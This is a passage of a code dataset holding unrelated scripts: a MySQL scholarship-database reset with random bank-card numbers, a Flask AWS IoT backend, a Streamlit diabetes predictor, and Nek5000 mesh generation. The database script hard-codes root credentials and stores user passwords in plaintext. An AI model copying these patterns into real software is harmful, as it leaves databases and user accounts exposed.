pymysql\r\nimport random \r\nimport pandas as pd\r\n\r\ndef reset():\r\n\r\n #随机生成银行卡号写入文件\r\n s='6217'\r\n card_num =[]\r\n flag= 20\r\n while flag:\r\n s='6217'\r\n for i in range(19):\r\n s = s+str(random.randint(0,10))\r\n if s not in card_num:\r\n card_num.append(s)\r\n flag = flag-1\r\n \r\n print(card_num)\r\n \r\n df = pd.read_excel('./data.xlsx',sheet_name='Sheet1')\r\n df['银行卡号'] = card_num\r\n pd.DataFrame(df).to_excel('data.xlsx', sheet_name='Sheet1', index=False, header=True)\r\n \r\n # 打开数据库\r\n db = pymysql.connect(host='localhost',port =3306,user='root',passwd='123456',db='scholarship',charset='utf8' )\r\n \r\n #使用cursor()方法获取操作游标\r\n cursor = db.cursor()\r\n \r\n SQL = \"\"\"CREATE DATABASE `scholarship`\"\"\"\r\n \r\n SQL1 = \"\"\"DROP TABLE IF EXISTS `stu_info`\"\"\"\r\n SQL2 = \"\"\"CREATE TABLE `stu_info` (\r\n `stu_id` varchar(32) NOT NULL COMMENT '学号',\r\n `stu_name` varchar(32) NOT NULL COMMENT '姓名',\r\n `stu_major` varchar(32) NOT NULL COMMENT '专业',\r\n `stu_class` varchar(32) NOT NULL COMMENT '班级',\r\n `card_num` varchar(32) NOT NULL COMMENT '银行卡号',\r\n `stu_scholarship` enum('是','否') NOT NULL COMMENT '奖学金有无',\r\n `stu_scholarship_status` enum('是','否') NOT NULL COMMENT '奖学金发放情况',\r\n PRIMARY KEY (`stu_id`)\r\n ) ENGINE=InnoDB DEFAULT CHARSET=UTF8MB4;\r\n \"\"\"\r\n cursor.execute(SQL1)\r\n cursor.execute(SQL2)\r\n #使用innodb引擎,数据库默认编码为utf-8\r\n # 创建插入SQL语句\r\n insert_sql = \"insert into stu_info values (%s, %s, %s, %s, %s, %s, %s);\"\r\n stu_data = pd.read_excel('./data.xlsx',sheet_name='Sheet1')\r\n # 创建一个for循环迭代读取xls文件每行数据的, 从第二行开始是要跳过标题\r\n for i in range(len(stu_data)):\r\n stu_id = str(stu_data.iloc[i,0])\r\n stu_name = str(stu_data.iloc[i,1])\r\n stu_major = str(stu_data.iloc[i,2])\r\n stu_class =str(stu_data.iloc[i,3])\r\n card_num = str(stu_data.iloc[i,4])\r\n stu_scholarship = str(stu_data.iloc[i,5])\r\n stu_scholarship_status = str(stu_data.iloc[i,6])\r\n values = (stu_id, stu_name, stu_major, stu_class, card_num, stu_scholarship, stu_scholarship_status)\r\n cursor.execute(insert_sql, values)\r\n cursor.connection.commit() \r\n \r\n SQL8 = \"\"\"DROP TABLE IF EXISTS `users`;\"\"\"\r\n SQL9 = \"\"\"CREATE TABLE `users` (\r\n `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '用户id',\r\n `user_name` varchar(32) NOT NULL COMMENT '用户名',\r\n `user_password` varchar(23) NOT NULL COMMENT '登录密码',\r\n PRIMARY KEY (`id`),\r\n UNIQUE KEY `user_name` (`user_name`)\r\n ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;\r\n \"\"\"\r\n cursor.execute(SQL8)\r\n cursor.execute(SQL9)\r\n \r\n #SQL10 = \"\"\"LOCK TABLES `users` WRITE;\"\"\"\r\n \r\n SQL11 = \"\"\"INSERT INTO `users` VALUES (1,'admin','123456'),(2,'momobaba','123456');\"\"\"\r\n cursor.execute(SQL11)\r\n cursor.connection.commit() \r\n \r\n #SQL12 = \"\"\"UNLOCK TABLES;\"\"\"\r\n \r\n db.close()\r\n \r\nif __name__ == '__main__':\r\n reset()","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"647634505","text":"import os\n\n#helper function that makes our rgb value a list\ndef quantify(rgbaString):\n\trgba = rgbaString\n\tr_gba = rgba.partition(',')\n\tr\t = r_gba[0]\n\tgba\t = r_gba[2]\n\tg_ba = gba.partition(',')\n\tg\t = g_ba[0]\n\tba\t = g_ba[2]\n\tb_a\t = ba.partition(',')\n\tb\t = b_a[0]\n\trgbList = [int(r),int(g),int(b)]\n\treturn rgbList\n\n#Parse the color table from gdalinfo\ndef MakeDict():\n\tresult = os.popen(\"gdalinfo NDVIcut.tif\").read()\n\tpart \t = result.partition(\"256 entries)\")\n\tcolorTable = part[2]\n\tcolorTable = colorTable[:-49]\n\tcolorDict = {}\n\tcolorList = colorTable.splitlines()\n\n\t#make a dictionary of the color table\n\n\tfor line in colorList:\n\t\tif (line==\"\"):\n\t\t\tcontinue\n\t\tcolorParts = line.partition(': ')\t\n\t\tkeyString = colorParts[0].rpartition(' ')\n\t\tkey \t = int(keyString[2])\n\t\tvalue\t\t = quantify(colorParts[2])\t\n\t\tcolorDict[key] = value\n\t\n\treturn colorDict\n\nmyDict = MakeDict()\nprint(myDict)\n","sub_path":"scripts/DictMaker.py","file_name":"DictMaker.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"273064327","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'swiftses.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^genaccount/', include('genaccount.urls', namespace=\"genaccount\")),\n url(r'^admin/', include(admin.site.urls)),\n]\n\nadmin.site.site_title = 'Swiftses Administration'\nadmin.site.site_header = 'Swiftses administration'\n","sub_path":"swiftses/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"46987962","text":"### 880. Decoded String at Index\n# Time complexity: O(N) where N = encoded string size\n# Space complexity: O(N) where N = encoded string size (O(1) if not count the input string)\nclass Solution: \n def decodeAtIndex(self, S, K):\n \"\"\"\n :type S: str\n :type K: int\n :rtype: str\n \"\"\"\n count = 0\n for s in S:\n count += (int(s)-1)*count if s.isdigit() else 1\n for s in S[::-1]:\n K = K%count\n if K == 0 and not s.isdigit(): return s\n if s.isdigit():\n count /= int(s)\n else:\n count -= 1\n","sub_path":"880/lc880-solution3.py","file_name":"lc880-solution3.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"314036780","text":"import FWCore.ParameterSet.Config as cms\n\nhltParticleFlowClusterHCALForEgamma = cms.EDProducer(\"PFMultiDepthClusterProducer\",\n clustersSource = cms.InputTag(\"hltParticleFlowClusterHBHEForEgamma\"),\n energyCorrector = cms.PSet(\n\n ),\n pfClusterBuilder = cms.PSet(\n algoName = cms.string('PFMultiDepthClusterizer'),\n allCellsPositionCalc = cms.PSet(\n algoName = cms.string('Basic2DGenericPFlowPositionCalc'),\n logWeightDenominator = cms.double(0.8),\n minAllowedNormalization = cms.double(1e-09),\n minFractionInCalc = cms.double(1e-09),\n posCalcNCrystals = cms.int32(-1)\n ),\n minFractionToKeep = cms.double(1e-07),\n nSigmaEta = cms.double(2.0),\n nSigmaPhi = cms.double(2.0)\n ),\n positionReCalc = cms.PSet(\n\n )\n)\n","sub_path":"HLTrigger/Configuration/python/HLT_75e33/modules/hltParticleFlowClusterHCALForEgamma_cfi.py","file_name":"hltParticleFlowClusterHCALForEgamma_cfi.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"568189028","text":"#!/usr/bin/env python\n##############################################################################\n# Copyright (c) 2017-2018, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n#\n# This file is part of Hatchet.\n# Created by Abhinav Bhatele .\n# LLNL-CODE-741008. All rights reserved.\n#\n# For details, see: https://github.com/LLNL/hatchet\n# Please also read the LICENSE file for the MIT License notice.\n##############################################################################\nfrom __future__ import print_function\nimport argparse\n\nfrom hatchet.hpctoolkit_reader import HPCToolkitReader\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='print timings for reading an HPCToolkit database')\n parser.add_argument('directory', metavar='DIRECTORY', action='store',\n help='directory to read')\n args = parser.parse_args()\n\n reader = HPCToolkitReader(args.directory)\n reader.create_graph()\n print(str(reader.timer))\n","sub_path":"examples/time-read.py","file_name":"time-read.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"338429923","text":"\"\"\"\n~~~~~~~~~~~~~~~~~\nweb.handlers.py\n\nImplements handler for apis errors\n~~~~~~~~~~~~~~~~~\n\"\"\"\n\nimport logging\n\nfrom flask import jsonify\n\n\nlogger = logging.getLogger(\"web.handlers\")\n\n\ndef api_error_handler(e):\n \"\"\"Handle all exceptions and generate corresponding response\"\"\"\n message = str(e)\n if len(message) > 0:\n message = message[0].upper() + message[1:]\n message = \"{}.\".format(message) if message[-1] != \".\" else message\n return jsonify({\"message\": message}), e.status\n","sub_path":"web/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"561578073","text":"import streamlit as st\nimport base64\nimport numpy as np\nimport pickle\n\n#Design of application UI\nLOGO_IMAGE = \"stingrai-header.jpg\"\n\nst.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True\n)\n\nst.markdown(\n f\"\"\"\n
    \n \n \"\"\",\n unsafe_allow_html=True\n)\n\n\n#Load Logistic Regression Model and define variable\npickle_in = open('Final_logreg_model.pk1','rb') #Load Logistic Regression model\nrf_Model = pickle.load(pickle_in)\n\n\ndef predict_diabetes(number_times_pregnant,plasma_glucose_concentration,diastolic_bp, triceps_skin_fold,\n two_hr_serum_insulin, BMI,diabetes_pedigree_function, age):\n input = np.array([[number_times_pregnant,plasma_glucose_concentration,diastolic_bp, triceps_skin_fold,\n two_hr_serum_insulin, BMI,diabetes_pedigree_function, age]]).astype(np.float64)\n prediction = rf_Model.predict_proba(input)\n pred = '{0:.{1}f}'.format(prediction[0][0], 3)\n result = 1.0-float(pred)\n final_result = '{:.3f}'.format(result)\n print(pred)\n return float(final_result)\n\n\ndef main():\n html_temp = \"\"\"\n
    \n

    Stingr.ai Diabetes Prediction

    \n
    \n \"\"\"\n st.markdown(html_temp,unsafe_allow_html=True)\n number_times_pregnant = st.text_input(\"Number of times pregnant\",\"0\")\n plasma_glucose_concentration = st.text_input(\"Plasma Glucose Concentration\",\"120\")\n diastolic_bp = st.text_input(\"Diastolic Blood Pressure (mm Hg)\",\"70\")\n triceps_skin_fold = st.text_input(\"Triceps Skin Fold Thickness (mm)\",\"10\")\n two_hr_serum_insulin = st.text_input(\"2-Hour Serum Insulin (mu U/ml)\",\"60\")\n BMI = st.text_input(\"Body Mass Index\",\"30\")\n diabetes_pedigree_function = st.text_input(\"Diabetes Pedigree Function\",\"0.320\")\n age = st.text_input(\"Age\",\"25\")\n result = \"\"\n safe_html=\"\"\"\n
    \n

    You're healthy and not at risk of developing diabetes.
    *This is not medical advice, please consult with a medical professional.

    \n
    \n \"\"\"\n danger_html=\"\"\"\n
    \n

    You're at risk of developing diabetes.
    *This is not medical advice, please consult with a medical professional.

    \n
    \n \"\"\"\n\n if st.button(\"Predict\"):\n result=predict_diabetes(number_times_pregnant,plasma_glucose_concentration,diastolic_bp, triceps_skin_fold,\n two_hr_serum_insulin, BMI,diabetes_pedigree_function, age)\n st.success('The probability of developing Type 2 Diabetes is {}'.format(result))\n\n if result > 0.5:\n st.markdown(danger_html,unsafe_allow_html=True)\n else:\n st.markdown(safe_html,unsafe_allow_html=True)\n\nif __name__=='__main__':\n main()\n","sub_path":"StingraiDiabetesPredictor.py","file_name":"StingraiDiabetesPredictor.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"333551739","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('', include('MainApp.urls')),\n path('product/', include('ProductApp.urls')),\n path('order/', include('OrderApp.urls')),\n path('user/', include('UserApp.urls')),\n path('blog/', include('BlogApp.urls')),\n path('admin/', admin.site.urls),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"ProsiddhoBD/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"286699546","text":"class Solution:\n \"\"\"\n @param s: A string\n @return: whether the string is a valid parentheses\n \"\"\"\n\n def isValidParentheses(self, s):\n if not s:\n return True\n\n stack = []\n left = ['(', '[', '{']\n\n for char in s:\n if char in left:\n stack.append(char)\n elif len(stack) == 0:\n return False\n else:\n l = stack.pop()\n if l == '(' and char != ')' or l == '[' and char != ']' or l == '{' and char != '}':\n return False\n\n return len(stack) == 0\n","sub_path":"423_Valid Parentheses.py","file_name":"423_Valid Parentheses.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"501812922","text":"import numpy as np\nimport sys\nfrom sklearn.datasets import load_boston\nfrom sklearn.utils import shuffle, resample\nfrom mini_flow import miniflow as mf\n\n# # Add node demo\n#\n# x, y = mf.Input(), mf.Input()\n# f1 = mf.Add(x, y)\n# feed_dict = {x: 10, y: 5}\n#\n# sorted_nodes = mf.topological_sort(feed_dict)\n# output = mf.forward_pass(f1, sorted_nodes)\n#\n# # NOTE: because topological_sort set the values for the `Input` nodes we\n# # could # also access the value for x with x.value (same goes for y).\n# print(\"{0} + {1} = {2} (according to miniflow)\".format(feed_dict[x],\n# feed_dict[y], output))\n\n# # Mul node demo\n#\n# x1, x2, x3, x4, x5 = mf.Input(), mf.Input(), mf.Input(), mf.Input(), mf.Input()\n# f2 = mf.Mul(x1, x2, x3, x4, x5)\n# feed_dict_2 = {x1: 1, x2: 2, x3: 3, x4: 4, x5: 5}\n#\n# sorted_nodes_2 = mf.topological_sort(feed_dict_2)\n# output_2 = mf.forward_pass(f2, sorted_nodes_2)\n#\n# print('5! = {0}'.format(output_2))\n\n# # Linear node demo\n#\n# X, W, b = mf.Input(), mf.Input(), mf.Input()\n#\n# f = mf.Linear(X, W, b)\n#\n# X_ = np.array([[-1., -2.], [-1, -2]])\n# W_ = np.array([[2., -3], [2., -3]])\n# b_ = np.array([-3., -5])\n#\n# feed_dict = {X: X_, W: W_, b: b_}\n#\n# graph = mf.topological_sort(feed_dict)\n# output = mf.forward_pass(f, graph)\n#\n# print(output) # should be 12.7 with this example\n\n# # Sigmoid demo\n#\n# X, W, b = mf.Input(), mf.Input(), mf.Input()\n#\n# f = mf.Linear(X, W, b)\n# g = mf.Sigmoid(f)\n#\n# X_ = np.array([[-1., -2.], [-1, -2]])\n# W_ = np.array([[2., -3], [2., -3]])\n# b_ = np.array([-3., -5])\n#\n# feed_dict = {X: X_, W: W_, b: b_}\n#\n# graph = mf.topological_sort(feed_dict)\n# output = mf.forward_pass(g, graph)\n#\n# \"\"\"\n# Output should be:\n# [[ 1.23394576e-04 9.82013790e-01]\n# [ 1.23394576e-04 9.82013790e-01]]\n# \"\"\"\n#\n# print(output)\n\n# # MSE demo\n#\n# y, a = mf.Input(), mf.Input()\n# cost = mf.MSE(y, a)\n#\n# y_ = np.array([1, 2, 3])\n# a_ = np.array([4.5, 5, 10])\n#\n# feed_dict = {y: y_, a: a_}\n# graph = mf.topological_sort(feed_dict)\n# # forward pass\n# mf.forward_pass(graph)\n#\n# \"\"\"\n# Expected output\n#\n# 23.4166666667\n# \"\"\"\n# print(cost.value)\n\n# Backpropagation demo\n#\n# X, W, b = mf.Input(), mf.Input(), mf.Input()\n# y = mf.Input()\n# f = mf.Linear(X, W, b)\n# a = mf.Sigmoid(f)\n# cost = mf.MSE(y, a)\n#\n# X_ = np.array([[-1., -2.], [-1, -2]])\n# W_ = np.array([[2.], [3.]])\n# b_ = np.array([-3.])\n# y_ = np.array([1, 2])\n#\n# feed_dict = {X: X_, y: y_, W: W_, b: b_ }\n#\n# graph = mf.topological_sort(feed_dict)\n# mf.forward_and_backward(graph)\n# # return the gradients for each Input\n# gradients = [t.gradients[t] for t in [X, y, W, b]]\n#\n# \"\"\"\n# Expected output\n#\n# [array([[ -3.34017280e-05, -5.01025919e-05],\n# [ -6.68040138e-05, -1.00206021e-04]]), array([[ 0.9999833],\n# [ 1.9999833]]), array([[ 5.01028709e-05],\n# [ 1.00205742e-04]]), array([ -5.01028709e-05])]\n# \"\"\"\n# print(gradients)\n\n\"\"\"\nCheck out the new network architecture and dataset!\n\nNotice that the weights and biases are\ngenerated randomly.\n\nNo need to change anything, but feel free to tweak\nto test your network, play around with the epochs, batch size, etc!\n\"\"\"\n\n# Load data\ndata = load_boston()\nX_ = data['data']\ny_ = data['target']\n\n# Normalize data\nX_ = (X_ - np.mean(X_, axis=0)) / np.std(X_, axis=0)\n\nn_features = X_.shape[1]\nn_hidden = 10\nW1_ = np.random.randn(n_features, n_hidden)\nb1_ = np.zeros(n_hidden)\nW2_ = np.random.randn(n_hidden, 1)\nb2_ = np.zeros(1)\n\n# Neural network\nX, y = mf.Input(), mf.Input()\nW1, b1 = mf.Input(), mf.Input()\nW2, b2 = mf.Input(), mf.Input()\n\nl1 = mf.Linear(X, W1, b1)\ns1 = mf.Sigmoid(l1)\nl2 = mf.Linear(s1, W2, b2)\ncost = mf.MSE(y, l2)\n\nfeed_dict = {X: X_,\n y: y_,\n W1: W1_,\n b1: b1_,\n W2: W2_,\n b2: b2_\n }\n\nepochs = 1024\n# Total number of examples\nm = X_.shape[0]\nbatch_size = 32\nsteps_per_epoch = m // batch_size\n\ngraph = mf.topological_sort(feed_dict)\ntrainables = [W1, b1, W2, b2]\n\nprint(\"Total number of examples = {}\".format(m))\n\n# Step 4\nfor i in range(epochs):\n loss = 0\n for j in range(steps_per_epoch):\n # Step 1\n # Randomly sample a batch of examples\n X_batch, y_batch = resample(X_, y_, n_samples=batch_size)\n\n # Reset value of X and y Inputs\n X.value = X_batch\n y.value = y_batch\n\n # Step 2\n mf.forward_and_backward(graph)\n\n # Step 3\n mf.sgd_update(trainables, learning_rate=0.01)\n\n loss += graph[-1].value\n\n sys.stdout.write(\"\\rEpoch: {0}, Loss: {1:.4f}\".format(i + 1,\n loss/steps_per_epoch))\n","sub_path":"mini-flow/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"226789057","text":"\"\"\"\nOne way to improve the quicksort is to use an insertion sort on lists that are small in length\n(call it the “partition limit”). Why does this make sense?\nRe-implement the quicksort and use it to sort a random list of integers.\nPerform analysis using different list sizes for the partition limit.\n\"\"\"\n\n\ndef partition(nums, low, high):\n # Мы выбираем средний элемент, в качестве опорного\n pivot = nums[(low + high) // 2]\n i = low - 1\n j = high + 1\n while True:\n i += 1\n while nums[i] < pivot:\n i += 1\n\n j -= 1\n while nums[j] > pivot:\n j -= 1\n\n if i >= j:\n return j\n\n # Если элемент в i (слева от оси) больше, чем элемент в j (справа от оси), то поменять их местами\n nums[i], nums[j] = nums[j], nums[i]\n\n\ndef quick_sort(nums):\n # Создаем вспомогательную рекурсивную функцию\n def _quick_sort(items, low, high):\n if low < high:\n # Это индекс после опорного элемента, по которому наши списки разделены\n split_index = partition(items, low, high)\n _quick_sort(items, low, split_index)\n _quick_sort(items, split_index + 1, high)\n\n _quick_sort(nums, 0, len(nums) - 1)\n\n\n# Проверка, что всё работает\nrandom_list_of_nums = [50, 12, 23, 5, 40, 33, 18, 1, 2, 98]\nquick_sort(random_list_of_nums)\nprint(random_list_of_nums)\n","sub_path":"homework/topic_27_sorting_algorithms/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"183507627","text":"from matplotlib import pyplot as plt\nplt.rcParams['font.sans-serif']=['SimHei'] #用来正常显示中文标签\nplt.rcParams['axes.unicode_minus']=False #用来正常显示负号\na = [\"战狼2\",\"速度与激情8\",\"功夫瑜伽\",\"西游伏妖篇\",\"变形金刚5\",\"摔跤吧爸爸\",\"加勒比海盗5\",\"金刚\",\"极限特工\",\"生化危机6\",\"乘风破浪\",\"绳头奶爸\",\"智取威虎山\",\"大拿天竺\",\"今年刚狼3\",\"指数下\",\"悟空传\",\"迎合护卫队 \",\"轻声\",\"新木乃伊\"]\nb = [56.01,26.94,17.53,49,15.45,12.96,11.8,11.61,11.28,11.12,10.49,10.3,8.75,7.55,7.32,6.99,6.88,6.86,6.58,6.23]\n\n#设置图形大小\nplt.figure(figsize=(20,15),dpi=80)\n\n# 绘制条形图\n#plt.bar(range(len(a)),b,width=0.3)#绘制竖形条形图\nplt.barh(range(len(a)),b,height=0.3,color=\"orange\")#绘制横形条形图\n#rotitian指的是字体旋转的角度\n#plt.xticks(range(len(a)),a,rotation=90)\nplt.yticks(range(len(a)),a)\nplt.grid(alpha=0.3)\nplt.show()\n","sub_path":"machine learning/Matlab/绘制条形图.py","file_name":"绘制条形图.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"176086206","text":"'''\n* CSE520 Real-Time Systems\n* UI Backend flask server\n* Jeremy Manin, Justin Marshall\n*\n* usage: (with FLASK_APP env var set to \"backend.py\") flask run\n'''\n\n# Import utility libraries\nimport json\nimport logging\nimport threading\nimport time\n# Import flask libraries\nfrom flask import Flask\nfrom flask_cors import CORS\n# Import AWS IoT library\nfrom AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient\n# Import backend subscription thread\nimport backend_sub\n\n# Flask setup\napp = Flask(__name__)\nCORS(app)\n\n# AWS IoT Setup\n## Connection settings\nhost = \"an91x6ytmr3ss-ats.iot.us-east-2.amazonaws.com\"\nrootCAPath = \"../../certs/root-CA.crt\"\ncertificatePath = \"../../certs/2db4660fce-certificate.pem.crt\"\nprivateKeyPath = \"../../certs/2db4660fce-private.pem.key\"\nport = 8883\nclientId = \"back_end_pub\"\ncontrolTopic = \"$aws/things/cloud_control/shadow/update\"\n\n## Configure logging\nlogger = logging.getLogger(\"AWSIoTPythonSDK.core\")\nlogger.setLevel(logging.ERROR)\nstreamHandler = logging.StreamHandler()\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nstreamHandler.setFormatter(formatter)\nlogger.addHandler(streamHandler)\n\n## Init AWSIoTMQTTClient\nmyAWSIoTMQTTClient = AWSIoTMQTTClient(clientId)\nmyAWSIoTMQTTClient.configureEndpoint(host, port)\nmyAWSIoTMQTTClient.configureCredentials(rootCAPath, privateKeyPath, certificatePath)\n\n## AWSIoTMQTTClient connection configuration\nmyAWSIoTMQTTClient.configureAutoReconnectBackoffTime(1, 32, 20)\nmyAWSIoTMQTTClient.configureOfflinePublishQueueing(-1) # Infinite offline Publish queueing\nmyAWSIoTMQTTClient.configureDrainingFrequency(2) # Draining: 2 Hz\nmyAWSIoTMQTTClient.configureConnectDisconnectTimeout(10) # 10 sec\nmyAWSIoTMQTTClient.configureMQTTOperationTimeout(5) # 5 sec\n\n## Connect to AWS IoT\nmyAWSIoTMQTTClient.connect()\ntime.sleep(2)\n\n# Create thread object for backend subwscription service\nclass sub_thread (threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n def run(self):\n backend_sub.start_sub()\n\n# Subscribe Start - Starts up backend subscription service\n@app.route(\"/subscribe-start\")\ndef start_subscribe():\n my_sub_thread = sub_thread()\n my_sub_thread.start()\n return('Subscription thread started')\n\n# Cloud Start - Sends cloud control topic to get gesture from glove\n@app.route(\"/cloud-start\")\ndef start_cloud():\n # Build and publish control topic telling cloud to start\n message = {}\n message['state'] = {}\n message['state']['reported'] = {}\n message['state']['reported']['command'] = 'start'\n messageJson = json.dumps(message)\n myAWSIoTMQTTClient.publish(controlTopic, messageJson, 1)\n \n # Return success\n return('Cloud control topic successfully published')\n\nif __name__ == '__main__':\n app.run(debug=True, use_reloader=True)\n","sub_path":"web-app/backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"372397106","text":"#!/usr/bin/env python3.5\n# This python script is inspired by pipeMeshNek.f90 from Jacopo Canton.\n# However, I am not that familiar with Fortran 90 and I wanted to \n# improve my python skills and understand the mesh generation better.\n# Hence, I rewrite the code from scratch\n#oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n# Steffen Straub\n# 2017-02-08\n#oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n\n## Import modules\n#----------------------------------------------------------------------\nimport nek_utils\nimport numpy as np\nimport math as m\nimport my_math\nimport elementclass \nimport pdb\nimport sys\nimport re\n\n# Input Variables\n#----------------------------------------------------------------------\n# Radius\nR = 0.5\n# Number of elements in radial direction\nnR = 15\n# Number of elements along one side of the \"square\" region\nnSq = 10\n# Length of the pipe in streamwise (z) direction\nL_z = 5.00\n# Number of elements in streamwise (z) direction\nnZ = 60\n\n# Type of thermal BC\nth_bc_type = 't '\n\n# In order to check the resolution requirements\nN = 9 # Polynomial order\nRe_t = 720 # Friction Reynolds number\n\n# Do you want thermal boundary conditions? \n# \"True\" or \"False\"\nif_therm = False\n\n\n\n# Some Input for tuning the mesh\n#----------------------------------------------------------------------\n\n# Stretch nominal value of dr in square by this factor\nstretch_sq = 1.10\n# Min to max element length along axis in square\ndr_sq_ratio = 0.8 \n\n# Ratio of min to max element of x (resp. y) component along intersection\n# Note that this is not the real length but its projection along x-, \n# respective y-axis\ndr_sq_int_ratio = 0.8 \n# First xx in onion region is increasing and (xx-1) is decreasing\ndistri_on = 0.5 \n\n# Semi-major axis at the interface betwenn square and onion region\n# Note: semi-minor axis is defined by position of element along y-axis\n#a_interf = 0.57\na_interf = 0.60\n\n# Keep the outermost onion layer constant: \n# 0 = not const., 1 = const.\ntog_r_out_const = 0\n# Use exp. or sin distribution for semi-major axis in onion region\n# exp gives a sharper decrease, hence more circle like shape in \n# the first onion layers, which can be good for low Re-flows with few\n# elements in onion region. For higher Re and more elements in onion \n# region \"sin\" is recommended\n# 0 = exp, 1 = sin, 2 = linear\ntog_a_on_dist = 1\n\n\n\n## 0: Check if input variables are OK\n#----------------------------------------------------------------------\nnek_utils.check_input(nR, nSq, nZ, R, L_z, th_bc_type, N, Re_t,\\\n if_therm)\n\n\n\n# Define some global variables here:\n#----------------------------------------------------------------------\ndr_nominal = R/nR # nominal length of one element\ndr = dr_nominal\ndz = L_z/nZ\n\nel_list = [] # list of all elements\n# number of elements in one cross section\nnel_quarter = (nSq**2+(nR-nSq)*nSq*2)\nnel_cross_section = nel_quarter*4 \n\nnumber = 1\n# Populate list of elements: first, the square region\nfor i in range(nSq):\n for j in range(nSq):\n el = elementclass.Element()\n el.number = number\n# el.c = np.zeros(4)\n el_list.append(el)\n number = number + 1\n# Populate list of elements: second, the curved region outside (onion region)\nfor i in range(nR-nSq): # loop through each onion like layer outwards\n for j in range(nSq*2): # loop in clockwise direction through each layer\n el = elementclass.Element()\n el.number = number\n# el.c = np.zeros(4)\n el_list.append(el)\n number = number + 1\n\n\n\n\n## A: Generate the mesh\n#----------------------------------------------------------------------\n## A.1: Generate the mesh for a quarter section\n#----------------------------------------------------------------------\n## A.1.1: Set vertex positions of elements\n# (This is the essential part of the code)\n#----------------------------------------------------------------------\nnek_utils.set_vertices(el_list, nR, nSq, dr, dz, dr_sq_ratio,\\\n dr_sq_int_ratio, stretch_sq, distri_on, a_interf,\\\n tog_r_out_const, tog_a_on_dist)\n\n## A.1.2: Set boundary conditions for faces \n#----------------------------------------------------------------------\n#nek_utils.set_bc_q1(el_list,nR,nSq)\n\n\n## A.2: Generate the complete mesh \n#----------------------------------------------------------------------\n## A.2.1: Set vertex positions\n#----------------------------------------------------------------------\nnek_utils.compl_mesh(el_list,nR,nSq)\nnek_utils.extrude(el_list,nR,nSq,nZ,dz)\n\n\n## A.2.2: Set boundary conditions\n# (for each quarter separately)\n#----------------------------------------------------------------------\nnek_utils.set_bc_q1(el_list,nR,nSq,th_bc_type)\nnek_utils.set_bc_q2(el_list,nR,nSq,th_bc_type)\nnek_utils.set_bc_q3(el_list,nR,nSq,th_bc_type)\nnek_utils.set_bc_q4(el_list,nR,nSq,th_bc_type)\n\n\n## B: Write the mesh to rea file\n#----------------------------------------------------------------------\n# generate a rea skeleton file\n#----------------------------------------------------------------------\nnek_utils.rea_skel(2, if_therm, 'base2d.rea')\nnek_utils.rea_skel(3, if_therm, 'base3d.rea')\n## B.1: Write vertex positions\n#----------------------------------------------------------------------\nnek_utils.write_mesh(el_list, nR, nSq, 2, 'base2d.rea')\nnek_utils.write_mesh(el_list, nR, nSq, 3, 'base3d.rea')\n## B.2: Write curved edges\n#----------------------------------------------------------------------\nnek_utils.write_curv(el_list, nR, nSq, 2, 'base2d.rea')\nnek_utils.write_curv(el_list, nR, nSq, 3, 'base3d.rea')\n## B.3: Write boundary conditions\n#----------------------------------------------------------------------\nnek_utils.write_fl_bc(el_list, nR, nSq, 2, 'base2d.rea')\nnek_utils.write_fl_bc(el_list, nR, nSq, 3, 'base3d.rea')\nif (if_therm):\n 